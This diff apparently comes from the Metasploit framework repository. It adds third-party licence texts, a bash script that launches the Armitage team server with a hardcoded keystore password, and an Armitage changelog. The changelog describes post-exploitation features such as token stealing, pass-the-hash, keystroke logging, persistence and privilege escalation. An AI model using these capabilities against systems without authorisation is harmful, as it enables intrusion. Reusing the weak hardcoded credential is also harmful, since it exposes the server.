+(which use some of those functions and data) to form executables.
+
+  The "Library", below, refers to any such software library or work
+which has been distributed under these terms.  A "work based on the
+Library" means either the Library or any derivative work under
+copyright law: that is to say, a work containing the Library or a
+portion of it, either verbatim or with modifications and/or translated
+straightforwardly into another language.  (Hereinafter, translation is
+included without limitation in the term "modification".)
+
+  "Source code" for a work means the preferred form of the work for
+making modifications to it.  For a library, complete source code means
+all the source code for all modules it contains, plus any associated
+interface definition files, plus the scripts used to control compilation
+and installation of the library.
+
+  Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running a program using the Library is not restricted, and output from
+such a program is covered only if its contents constitute a work based
+on the Library (independent of the use of the Library in a tool for
+writing it).  Whether that is true depends on what the Library does
+and what the program that uses the Library does.
+  
+  1. You may copy and distribute verbatim copies of the Library's
+complete source code as you receive it, in any medium, provided that
+you conspicuously and appropriately publish on each copy an
+appropriate copyright notice and disclaimer of warranty; keep intact
+all the notices that refer to this License and to the absence of any
+warranty; and distribute a copy of this License along with the
+Library.
+
+  You may charge a fee for the physical act of transferring a copy,
+and you may at your option offer warranty protection in exchange for a
+fee.
+
+  2. You may modify your copy or copies of the Library or any portion
+of it, thus forming a work based on the Library, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) The modified work must itself be a software library.
+
+    b) You must cause the files modified to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    c) You must cause the whole of the work to be licensed at no
+    charge to all third parties under the terms of this License.
+
+    d) If a facility in the modified Library refers to a function or a
+    table of data to be supplied by an application program that uses
+    the facility, other than as an argument passed when the facility
+    is invoked, then you must make a good faith effort to ensure that,
+    in the event an application does not supply such function or
+    table, the facility still operates, and performs whatever part of
+    its purpose remains meaningful.
+
+    (For example, a function in a library to compute square roots has
+    a purpose that is entirely well-defined independent of the
+    application.  Therefore, Subsection 2d requires that any
+    application-supplied function or table used by this function must
+    be optional: if the application does not supply it, the square
+    root function must still compute square roots.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Library,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Library, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote
+it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Library.
+
+In addition, mere aggregation of another work not based on the Library
+with the Library (or with a work based on the Library) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may opt to apply the terms of the ordinary GNU General Public
+License instead of this License to a given copy of the Library.  To do
+this, you must alter all the notices that refer to this License, so
+that they refer to the ordinary GNU General Public License, version 2,
+instead of to this License.  (If a newer version than version 2 of the
+ordinary GNU General Public License has appeared, then you can specify
+that version instead if you wish.)  Do not make any other change in
+these notices.
+
+  Once this change is made in a given copy, it is irreversible for
+that copy, so the ordinary GNU General Public License applies to all
+subsequent copies and derivative works made from that copy.
+
+  This option is useful when you wish to copy part of the code of
+the Library into a program that is not a library.
+
+  4. You may copy and distribute the Library (or a portion or
+derivative of it, under Section 2) in object code or executable form
+under the terms of Sections 1 and 2 above provided that you accompany
+it with the complete corresponding machine-readable source code, which
+must be distributed under the terms of Sections 1 and 2 above on a
+medium customarily used for software interchange.
+
+  If distribution of object code is made by offering access to copy
+from a designated place, then offering equivalent access to copy the
+source code from the same place satisfies the requirement to
+distribute the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  5. A program that contains no derivative of any portion of the
+Library, but is designed to work with the Library by being compiled or
+linked with it, is called a "work that uses the Library".  Such a
+work, in isolation, is not a derivative work of the Library, and
+therefore falls outside the scope of this License.
+
+  However, linking a "work that uses the Library" with the Library
+creates an executable that is a derivative of the Library (because it
+contains portions of the Library), rather than a "work that uses the
+library".  The executable is therefore covered by this License.
+Section 6 states terms for distribution of such executables.
+
+  When a "work that uses the Library" uses material from a header file
+that is part of the Library, the object code for the work may be a
+derivative work of the Library even though the source code is not.
+Whether this is true is especially significant if the work can be
+linked without the Library, or if the work is itself a library.  The
+threshold for this to be true is not precisely defined by law.
+
+  If such an object file uses only numerical parameters, data
+structure layouts and accessors, and small macros and small inline
+functions (ten lines or less in length), then the use of the object
+file is unrestricted, regardless of whether it is legally a derivative
+work.  (Executables containing this object code plus portions of the
+Library will still fall under Section 6.)
+
+  Otherwise, if the work is a derivative of the Library, you may
+distribute the object code for the work under the terms of Section 6.
+Any executables containing that work also fall under Section 6,
+whether or not they are linked directly with the Library itself.
+
+  6. As an exception to the Sections above, you may also combine or
+link a "work that uses the Library" with the Library to produce a
+work containing portions of the Library, and distribute that work
+under terms of your choice, provided that the terms permit
+modification of the work for the customer's own use and reverse
+engineering for debugging such modifications.
+
+  You must give prominent notice with each copy of the work that the
+Library is used in it and that the Library and its use are covered by
+this License.  You must supply a copy of this License.  If the work
+during execution displays copyright notices, you must include the
+copyright notice for the Library among them, as well as a reference
+directing the user to the copy of this License.  Also, you must do one
+of these things:
+
+    a) Accompany the work with the complete corresponding
+    machine-readable source code for the Library including whatever
+    changes were used in the work (which must be distributed under
+    Sections 1 and 2 above); and, if the work is an executable linked
+    with the Library, with the complete machine-readable "work that
+    uses the Library", as object code and/or source code, so that the
+    user can modify the Library and then relink to produce a modified
+    executable containing the modified Library.  (It is understood
+    that the user who changes the contents of definitions files in the
+    Library will not necessarily be able to recompile the application
+    to use the modified definitions.)
+
+    b) Use a suitable shared library mechanism for linking with the
+    Library.  A suitable mechanism is one that (1) uses at run time a
+    copy of the library already present on the user's computer system,
+    rather than copying library functions into the executable, and (2)
+    will operate properly with a modified version of the library, if
+    the user installs one, as long as the modified version is
+    interface-compatible with the version that the work was made with.
+
+    c) Accompany the work with a written offer, valid for at
+    least three years, to give the same user the materials
+    specified in Subsection 6a, above, for a charge no more
+    than the cost of performing this distribution.
+
+    d) If distribution of the work is made by offering access to copy
+    from a designated place, offer equivalent access to copy the above
+    specified materials from the same place.
+
+    e) Verify that the user has already received a copy of these
+    materials or that you have already sent this user a copy.
+
+  For an executable, the required form of the "work that uses the
+Library" must include any data and utility programs needed for
+reproducing the executable from it.  However, as a special exception,
+the materials to be distributed need not include anything that is
+normally distributed (in either source or binary form) with the major
+components (compiler, kernel, and so on) of the operating system on
+which the executable runs, unless that component itself accompanies
+the executable.
+
+  It may happen that this requirement contradicts the license
+restrictions of other proprietary libraries that do not normally
+accompany the operating system.  Such a contradiction means you cannot
+use both them and the Library together in an executable that you
+distribute.
+
+  7. You may place library facilities that are a work based on the
+Library side-by-side in a single library together with other library
+facilities not covered by this License, and distribute such a combined
+library, provided that the separate distribution of the work based on
+the Library and of the other library facilities is otherwise
+permitted, and provided that you do these two things:
+
+    a) Accompany the combined library with a copy of the same work
+    based on the Library, uncombined with any other library
+    facilities.  This must be distributed under the terms of the
+    Sections above.
+
+    b) Give prominent notice with the combined library of the fact
+    that part of it is a work based on the Library, and explaining
+    where to find the accompanying uncombined form of the same work.
+
+  8. You may not copy, modify, sublicense, link with, or distribute
+the Library except as expressly provided under this License.  Any
+attempt otherwise to copy, modify, sublicense, link with, or
+distribute the Library is void, and will automatically terminate your
+rights under this License.  However, parties who have received copies,
+or rights, from you under this License will not have their licenses
+terminated so long as such parties remain in full compliance.
+
+  9. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Library or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Library (or any work based on the
+Library), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Library or works based on it.
+
+  10. Each time you redistribute the Library (or any work based on the
+Library), the recipient automatically receives a license from the
+original licensor to copy, distribute, link with or modify the Library
+subject to these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties with
+this License.
+
+  11. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Library at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Library by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Library.
+
+If any portion of this section is held invalid or unenforceable under any
+particular circumstance, the balance of the section is intended to apply,
+and the section as a whole is intended to apply in other circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  12. If the distribution and/or use of the Library is restricted in
+certain countries either by patents or by copyrighted interfaces, the
+original copyright holder who places the Library under this License may add
+an explicit geographical distribution limitation excluding those countries,
+so that distribution is permitted only in or among countries not thus
+excluded.  In such case, this License incorporates the limitation as if
+written in the body of this License.
+
+  13. The Free Software Foundation may publish revised and/or new
+versions of the Lesser General Public License from time to time.
+Such new versions will be similar in spirit to the present version,
+but may differ in detail to address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Library
+specifies a version number of this License which applies to it and
+"any later version", you have the option of following the terms and
+conditions either of that version or of any later version published by
+the Free Software Foundation.  If the Library does not specify a
+license version number, you may choose any version ever published by
+the Free Software Foundation.
+
+  14. If you wish to incorporate parts of the Library into other free
+programs whose distribution conditions are incompatible with these,
+write to the author to ask for permission.  For software which is
+copyrighted by the Free Software Foundation, write to the Free
+Software Foundation; we sometimes make exceptions for this.  Our
+decision will be guided by the two goals of preserving the free status
+of all derivatives of our free software and of promoting the sharing
+and reuse of software generally.
+
+			    NO WARRANTY
+
+  15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO
+WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW.
+EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
+OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY
+KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE
+LIBRARY IS WITH YOU.  SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME
+THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
+
+  16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN
+WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY
+AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU
+FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR
+CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE
+LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING
+RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A
+FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF
+SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
+DAMAGES.
+
+		     END OF TERMS AND CONDITIONS
+
+````
+
+
+
+OpenSSL
+=======
+ - The OpenSSL library embedded into the Meterpreter payload binaries and the
+   corresponding header files in the source tree
+
+````
+The OpenSSL toolkit stays under a dual license, i.e. both the conditions of
+the OpenSSL License and the original SSLeay license apply to the toolkit.
+See below for the actual license texts. Actually both licenses are BSD-style
+Open Source licenses. In case of any license issues related to OpenSSL
+please contact openssl-core@openssl.org.
+
+OpenSSL License
+---------------
+/* ====================================================================
+ * Copyright (c) 1998-2011 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+ Original SSLeay License
+ -----------------------
+
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+````
+
+
+MIT
+===
+ - The SSHKey library located under lib/sshkey.
+   Copyright (c) 2011 James Miller
+ - The Net::SSH library located under lib/net/ssh.
+   Copyright (c) 2008 Jamis Buck <jamis@37signals.com>
+ - Anemone located under lib/anemone
+   Copyright (c) 2009 Vertive, Inc.
+ - RKelly located under lib/rkelly/
+   Copyright (c) 2007, 2008, 2009 Aaron Patterson, John Barnette
+ - Gem components located under lib/gemcache
+   * actionmailer - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * actionpack - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activemodel - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activerecord - Copyright (c) 2004-2011 David Heinemeier Hansson
+   * activeresource - Copyright (c) 2006-2011 David Heinemeier Hansson
+   * activesupport - Copyright (c) 2005-2011 David Heinemeier Hansson
+   * authlogic - Copyright (c) 2011 Ben Johnson of Binary Logic
+   * carrierwave - Copyright (c) 2008-2012 Jonas Nicklas
+   * chunky_png - Copyright (c) 2010 Willem van Bergen
+   * daemons - Copyright (c) 2005-2012 Thomas Uehlinger
+   * diff-lcs - Copyright 2004–2011 Austin Ziegler
+   * formtastic - Copyright (c) 2008-2010 Justin French
+   * fssm - Copyright (c) 2011 Travis Tilley
+   * hike - Copyright (c) 2011 Sam Stephenson
+   * i18n - Copyright (c) 2008 The Ruby I18n team
+   * jquery-rails - Copyright (c) 2010 Andre Arko
+   * liquid - Copyright (c) 2005, 2006 Tobias Luetke
+   * method_source - Copyright (c) 2011 John Mair (banisterfiend)
+   * multi_json - Copyright (c) 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc.
+   * rack - Copyright (c) 2007, 2008, 2009, 2010 Christian Neukirchen <purl.org/net/chneukirchen>
+   * rack-cache - Copyright (c) 2008 Ryan Tomayko <http://tomayko.com/about>
+   * rack-ssl - Copyright (c) 2010 Joshua Peek
+   * rake - Copyright (c) 2003, 2004 Jim Weirich
+   * slop - Copyright (c) 2012 Lee Jarvis
+   * sprockets - Copyright (c) 2011 Sam Stephenson, Copyright (c) 2011 Joshua Peek
+   * state_machine - Copyright (c) 2006-2012 Aaron Pfeifer
+   * thor - Copyright (c) 2008 Yehuda Katz
+   * tilt - Copyright (c) 2010 Ryan Tomayko <http://tomayko.com/about>
+   * treetop - Copyright (c) 2007 Nathan Sobo
+   * tzinfo - Copyright (c) 2005-2006 Philip Ross
+
+
+
+
+````
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
+
+````
+

data/armitage/teamserver

@@ -0,0 +1,72 @@
+#!/bin/bash
+# start msfrpcd and the deconfliction server. Check for common mistakes
+# to save some time and head scratching...
+
+# check the arguments
+EXPECTED=2
+if [ $# -ne $EXPECTED ]; then
+	echo "[-] You must provide: <external IP address> <team password>"
+	echo "    <external IP address> must be reachable by Armitage"
+	echo "          clients on port 55553"
+	echo "    <team password> is a shared password your team uses to"
+	echo "          authenticate to the Armitage team server"
+	exit
+fi
+
+# check that we're r00t
+if [ $UID -ne 0 ]; then
+	echo "[-] Superuser privileges are required to run the team server"
+	exit 
+fi
+
+# check if java is available...
+if [ $(command -v java) ]; then
+	true
+else
+	echo "[-] java is not in \$PATH"
+	echo "    is Java installed?"
+	exit
+fi
+
+# check if keytool is available...
+if [ $(command -v keytool) ]; then
+	true
+else
+	echo "[-] keytool is not in \$PATH"
+	echo "    install the Java Developer Kit"
+	exit
+fi
+
+# check if msfrpcd is available
+if [ $(command -v msfrpcd) ]; then
+	true
+else
+	echo "[-] msfrpcd is not in \$PATH"
+	echo "    is Metasploit installed?"
+	exit
+fi
+
+# check if msfrpcd is running or not
+if [ "$(pidof msfrpcd)" ]; then
+	echo "[-] msfrpcd is already running. Kill it before running this script"
+	echo "    try: killall -9 msfrpcd"
+	exit
+fi
+
+# generate a certificate
+	# naturally you're welcome to replace this step with your own permanent certificate.
+	# just make sure you pass -Djavax.net.ssl.keyStore="/path/to/whatever" and
+	# -Djavax.net.ssl.keyStorePassword="password" to java. This is used for setting up
+	# an SSL server socket. Also, the SHA-1 digest of the first certificate in the store
+	# is printed so users may have a chance to verify they're not being owned.
+echo "[+] Generating X509 certificate and keystore (for SSL)"
+rm -f ./armitage.store
+keytool -keystore ./armitage.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias armitage -dname "CN=Armitage Hacker, OU=FastAndEasyHacking, O=Armitage, L=Somewhere, S=Cyberspace, C=Earth"
+
+# start everything up
+echo "[+] Starting RPC daemon"
+msfrpcd -U msf -P $2 -a 127.0.0.1 -p 55554 -S
+echo "[+] sleeping for 20s (to let msfrpcd initialize)"
+sleep 20
+echo "[+] Starting Armitage team server"
+java -Djavax.net.ssl.keyStore=./armitage.store -Djavax.net.ssl.keyStorePassword=123456 -server -XX:+UseParallelGC -jar armitage.jar --server $1 55554 msf $2 55553

data/armitage/whatsnew.txt

@@ -1,6 +1,247 @@
 Armitage Changelog
 ==================
 
+26 Nov 12 (tested against msf 16114)
+---------
+- Windows command shell tab is now friendlier to commands that prompt
+  for input (e.g., time command)
+- [host] -> Meterpreter -> Access -> Escalate Privileges now shows all
+  the framework's new exploit/windows/local modules too
+- [host] -> Shell -> Post Modules now shows the framework's unix/local 
+  and exploit/linux/local modules
+- Added Ctrl+I shortcut. Lets you choose a session to interact with.
+- Added Steal Token button to Processes dialog.
+- Armitage now asks Metasploit for a non-expiring authentication token.
+  This will prevent Armitage from losing its access to msfrpcd when you
+  put your computer to sleep or pause the VM running Metasploit.
+- add_user and add_[local]group_user now show all of their output when
+  the -h flag is used to operate on a remote host.
+- added a Delete menu to creds table. Right-click a cred to delete it
+
+Cortana Updates (for scripters)
+--------
+- aliased &data_delete to &data_clear to match the documentation.
+- &file_get, &loot_get, and &file_content no longer delete the remote 
+  file when connected to a teamserver.
+
+16 Oct 12 (tested against msf 15972)
+---------
+- Added port 5985 to MSF Scans list.
+- Meterpreter -> Access -> Persistence sets ACTION option for you
+- Changed how LHOST and LPORT are set globally to prevent Ruby 
+  character encoding conversion error in the framework.
+- Pass Session, Log Keystrokes, and Persist now query module info
+  in a separate thread (avoids a deadlock opportunity)
+- Armitage now shows folder/URL in a popup dialog for environments
+  where JDesktop API to open them directly is not supported
+- Check all credentials option now filters the list to avoid trying
+  a pair of credentials twice.
+- Armitage's exploit payload selection now selects cmd/unix/interact
+  when appropriate.
+- Explore -> Processes now works with Java Meterpreter again.
+- MSF Scans feature now runs http_version against port 443
+
+5 Sept 12 (tested against msf r15804)
+---------
+- Setup dialog now trims host, port, user, and pass fields.
+- Armitage now complains when it can't write to your preferences
+  file (versus just hanging without a real error message)
+- View -> Jobs now queries jobs in a thread outside of UI thread
+- Tab completion now uses a separate thread to call into the RPC
+  server. This prevents a deadlock if server is not responding.
+- Login -> psexec now shows when 445 is open on a Windows machine.
+  The old criteria was too restrictive.
+- Added a helper to set Wordlist option
+- Armitage now sets a random LPORT for non-exploit modules with an
+  LPORT option (e.g., post modules that do priv escalation)
+- Armitage now shows an error if it can't open a Win command shell
+- Steal Token dialog now uses incognito module to get token data 
+  instead of the MSF post module. This is more reliable.
+- You may now setup the reverse payload for current_user_psexec
+
+Cortana Updates (for scripters)
+--------
+- added an eventlog popup hook
+
+16 Aug 12 (tested against msf r15753)
+----------
+- Dynamic workspaces now removes closed services from its set of
+  hosts matching certain open ports.
+- Cortana console now reports a clear error message a built-in
+  command is executed without the right number of arguments.
+- Added host icons for Android and iOS. You may now set these
+  operating systems by going to [host] -> Host -> Operating System
+- Armitage now shows the client-side exploit dialog for any exploit
+  that does not target an RHOST (for example, windows/smb/smb_relay)
+- Added support for remote exploits that use RHOSTS over RHOST
+  (this includes the new windows/local/current_user_psexec)
+- Added a helper for setting the SESSION option
+
+Cortana Updates (for scripters)
+--------
+- s_cmd no longer times out after 60s. It will wait forever for
+  a command to complete now.
+- added shell_read event which fires when a shell s_cmd comes
+  back with intermediate output.
+- fixed a potential deadlock with &open_console_tab
+- scripts now have the ability to redefine the max size of a 
+  workspace: db_workspace(%(size => #####));
+
+2 Aug 12 (tested again msf r15698)
+--------
+- Armitage now reports vulnerability module and descriptions 
+  properly (again) when exporting data. Had to update to match a
+  change to the db schema.
+- Pass-the-Hash and Login dialogs now stay open if you press 
+  shift while clicking Launch. This convention is pretty universal
+  to Armitage.
+- Team server now buffers all of its outgoing data. I've also 
+  disabled SO_NODELAY. This will greatly improve team server latency
+  on congested networks without impacting responsiveness otherwise.
+- Added Cortana, a DARPA funded scripting technology, into Armitage.
+  There's a lot of fun to be had here.
+- Armitage now queues messages to destroy a console rather than
+  spinning up a new thread for each closed console.
+- Rendering of icons for hosts now happens outside of UI thread.
+- Increased timeout for meterpreter read command
+- Armitage now detects a corrupt module cache and attempts to clear
+  it so it can be rebuilt. 
+
+5 Jul 12
+--------
+- Login -> psexec now sets a different LPORT for each host it's
+  launched against when using a reverse payload. Fixes a bug where
+  using a reverse connect payload against X hosts didn't work.
+- Progressbar Cancel button now works with the Sync Files button
+  in View -> Downloads and View -> Loot
+- Fixed a potential deadlock with the Sync Files feature
+- Clicking the Size column in View -> Downloads now sorts properly
+
+24 Jun 12
+---------
+- Meterpreter -> Kill now uses session.stop RPC call
+- Simplified code to stop a running job
+- Added an option to disable TCP_NODELAY from the comamnd line:
+
+	java -Darmitage.enable_nagle=true -jar armitage.jar
+
+  Use this if you see "bad mac" SSL errors when connected to a
+  team server.
+- Log Keystrokes tab now changes color when there is activity
+- Randomized filename for USERPASS_FILE to allow multiple brute
+  forces to happen at once.
+- Added a View item in the File Browser's popup menu. This will
+  let you quickly read several highlighted text files (it also
+  saves the files to the right place locally too)
+
+7 Jun 12 - Adding on to those quick bug fixes / tweaks
+--------
+- Disabled Nagles algorithm for team server and client SSL sockets.
+  This makes team server much more responsive... trust me.
+- Fixed bug preventing Armitage from showing "Started Service" 
+  message when starting the SOCKS Proxy server.
+- Fixed a find feature highlight bug in the View tab.
+
+30 May 12 - A few quick bug fixes / tweaks...
+---------
+- Fixed an exception when killing a session or removing a route 
+  through the UI. 
+- Oooh, ps command added a new column to its output. Updated ps  
+  parser to handle this.
+- Hosts -> Import Hosts now works under Windows again. Had to 
+  escape the filename. *sigh*
+- Hail Mary now sets LHOST option. This is necessary for some 
+  attacks to work properly.
+- Tweaked console create code in beginning of Armitage setup to 
+  hopefully avoid aggravating the evil console.create deadlock
+  condition.
+
+21 May 12
+---------
+- Added a hack to prevent the input area from flickering when the 
+  prompt changes.
+- Updated the color palette to something a little more subtle.
+- Added an optimization to how modules are launched. This will make
+  a difference for team use in high latency situations.
+- Rewrote MSF Scans feature to use console queue. This option is more
+  reliable and it makes the code easier to follow.
+- Added a hack to combine chat message writes with a read request.
+  This will make the event log more responsive in a high latency 
+  situation (can't you tell I care about this "situation")
+- Fixed text highlights through Ctrl+F on Windows. UNIX platforms 
+  were always OK. Another good reason to not use these tools on 
+  Windows. Ever.
+- View -> Downloads Sync Files feature now works on Windows. It looks
+  like leaving those pesky :'s in the file paths is bad.
+
+17 May 12
+---------
+- Fixed bug with loot/download viewer breaking with a font resize.
+- Default console font color is now grey. I never noticed that I had
+  white text on a black background before. That's a lot of contrast.
